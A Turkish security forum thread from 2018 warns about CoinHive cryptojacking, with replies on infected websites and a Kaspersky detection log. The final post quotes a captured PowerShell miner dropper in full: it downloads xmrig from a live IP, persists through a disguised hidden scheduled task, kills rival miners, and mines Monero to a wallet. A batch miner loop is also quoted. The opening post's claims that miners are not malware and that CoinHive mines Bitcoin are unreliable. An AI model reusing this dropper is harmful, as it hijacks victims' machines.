Anasayfa » Forum

CoinHive / Cryptoja...
 
Bildirimler

CoinHive / Cryptojacking Casus Yazılımlara Dikkat!  

  RSS
KARTAL YURTSEVEN
(@KARTALYURTSEVEN)
Üye

Fidyecilerin yeni yöntemi web tarayıcılara yüklenen ve sistemlere  bulaşan "cryptojacking" ve "CoinHive" adı verilen zararlı yazılımlardır. Bu yazılımlar kripto para birimlerini, bilginiz olmadan CPU kaynaklarınızı kullanarak çıkarmak için kullanılan yeni bir yöntemdir. 

  • Cryptominer araçları bilgisayarınıza zarar vermez ve diskinizde depolanmaz, bu nedenle kötü amaçlı yazılım olarak değerlendirilemezler. Bu yüzden %99 lara varan CPU güçlerini kullandıklarından can sıkıcı yazılım olarak tanımlanırlar.
  • CoinHive , Bitcoin madenciliği ile ilişkili bir Javascript aracıdır. 
  • Etkilenen sitelerin ele geçirildiği düşünülür ve bu sayfalar da masum kullanıcılara hizmet eder.

Bu yöntem ile kazanılan tahmini gelirin ayda yaklaşık 12.000 $ olduğu iddia ediliyor.

 

Ayrıntılar için;

https://www.fortiguard.com/encyclopedia/virus/7513257

 

https://blog.fortinet.com/2017/10/19/cryptojacking-digging-for-your-own-treasure

 

https://www.kaspersky.com/blog/hidden-miners-botnet-threat/18488/

 

Alıntı
Gönderildi : 16/01/2018 17:28
Murat DEMİRBAĞ
(@muratdemirbag)
Üye

Hocam bilgilendirme için kendi adıma teşekkür ederim.

CevapAlıntı
Gönderildi : 16/01/2018 19:44
Zafer ALTI
(@ZaferALTI)
Üye

 Aynı şekilde web sitelere de bulaşıyorlar, özellikle web sitesine bulaşması durumunda çok can sıkıcı oluyor zamanında hosting hizmeti veren taraf ile pek çok problem yaşadık, bu nedenlerden dolayı hem hostingi hem de web sitesini tamamen değiştirmek zorunda kalmıştık, pire için yorgan yakmak zorunda kaldık yani. Çeşitli çözümler çıkıyor yakın zamanda bu virüsde ciddi oranda düşüş yaşanır diye düşünüyorum, firmalar güncelleme, bilgilendirme yapmaya başladılar.

CevapAlıntı
Gönderildi : 16/01/2018 20:08
Aziz Kadagan
(@azizkadagan)
Üye

Bilgilendirme için teşekkürler.

CevapAlıntı
Gönderildi : 17/01/2018 11:18
KARTAL YURTSEVEN
(@KARTALYURTSEVEN)
Üye

[quote user="Zafer ALTI"]

 Aynı şekilde web sitelere de bulaşıyorlar, özellikle web sitesine bulaşması durumunda çok can sıkıcı oluyor zamanında hosting hizmeti veren taraf ile pek çok problem yaşadık, bu nedenlerden dolayı hem hostingi hem de web sitesini tamamen değiştirmek zorunda kalmıştık, pire için yorgan yakmak zorunda kaldık yani. Çeşitli çözümler çıkıyor yakın zamanda bu virüsde ciddi oranda düşüş yaşanır diye düşünüyorum, firmalar güncelleme, bilgilendirme yapmaya başladılar.

[/quote]

 

Rica ederim arkdaşlar. Zafer Altı' nın dediği gibi Web sitelerine de bulaşıyor. Özellikle WP, Joomla gibi açık kaynak kodlu web sitelerinde dikkat edilmelidir, güncellemeleri ve pentestleri ihmal etmemek gerek.

CevapAlıntı
Gönderildi : 18/01/2018 16:52
Resul SOYDAŞ
(@resulsoydas)
Üye

Kaspersky AV bu gün bir kullanıcıda yakalamış. İşin ilginci ben bu post'u ve AV'nin mailini hemen hemen aynı zamanlarda gördüm ve okudum ;-)).

Sezgisel olarak bulmuş.

 

        Critical event: 18.01.2018 10:06:09:
Event type:     Probably infected object detected
Application\Name:     Internet Explorer
Application\Path:     C:\Program Files (x86)\internet explorer\
Application\Process ID:     1268
User:     domain\username (Active user)
Component:     File Anti-Virus
Result\Description:     Detected
Result\Type:     Trojan
Result\Name:     HEUR:Trojan.Script.Generic
Result\Threat level:     High
Result\Precision:     Heuristic Analysis
Object:     C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62Q201B4\coinhive.min[1].js
Object\Type:     File
Object\Path:     C:\Users\username\
AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62Q201B4\
Object\Name:     coinhive.min[1].js
Reason:     Local databases
Database release date:     18.01.2018 04:24:00

CevapAlıntı
Gönderildi : 18/01/2018 19:31
Samet İleli
(@sametileli)
Üye

$ne = $MyInvocation.MyCommand.Path $nurl = "http://158.69.133.17:8220/xmrig.exe" $noutput = "$env:TMP\yam.exe" $vc = New-Object System.Net.WebClient $vc.DownloadFile($nurl,$noutput) copy $ne $HOME\SchTask.ps1 copy $env:TMP\yam.exe $env:TMP\xe.exe SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle productsa" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F SchTasks.exe /Delete /TN "Update service for Oracle products" /F SchTasks.exe /Delete /TN "Update service for Oracle products5" /F SchTasks.exe /Delete /TN "Update service for Oracle products1" /F SchTasks.exe /Delete /TN "Update service for Oracle products2" /F SchTasks.exe /Delete /TN "Update service for Oracle products3" /F SchTasks.exe /Delete /TN "Update service for Oracle products4" /F SchTasks.exe /Delete /TN "Update service for Oracle products7" /F SchTasks.exe /Delete /TN "Update service for Oracle products8" /F SchTasks.exe /Delete /TN "Update service for Oracle products0" /F while ($true) { if(!(Get-Process xe -ErrorAction SilentlyContinue)) { echo "Not running" cmd.exe /C taskkill /IM ddg.exe /f cmd.exe /C taskkill /IM yam.exe /f cmd.exe /C taskkill /IM miner.exe /f cmd.exe /C taskkill /IM xmrig.exe /f cmd.exe /C taskkill /IM nscpucnminer32.exe /f cmd.exe /C taskkill /IM 1e.exe /f cmd.exe /C taskkill /IM iie.exe /f cmd.exe /C taskkill /IM 3.exe /f cmd.exe /C taskkill /IM iee.exe /f cmd.exe /C taskkill /IM ie.exe /f cmd.exe /C taskkill /IM je.exe /f cmd.exe /C taskkill /IM ie.exe /f cmd.exe /C taskkill /IM iexplorer.exe /f cmd.exe /C $env:TMP\xe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x } else { echo "Running" } Start-Sleep 55 }

 

http://158.69.133.17:8220/1.ps1  adrsinden üstteki scripti çekiyor benim yakaladığım kalın seçtiğim yer sanırım monero coin kazdığı havuzun pool hash ı 

dikkat edilmesi gerekiyor açıkcası sunucu üzerindeki yumurtlamaya sebep olan .bat dosyasının içeriğide altta.

 

 

@echo off :P1 Start /W rundll32.exe -c x -M stratum+tcp://47Q1iH2tQD52qB7G4RxFaS31JEF5wWEzt77Zqa22dwKFi4b84qkkaV7JGu3Yy6uHmwR1oeKFN7uMT54UUAnaUdnmBr6piKx:x@at02.supportxmr.com:443/xmr goto P1

CevapAlıntı
Gönderildi : 25/01/2018 21:24
Paylaş: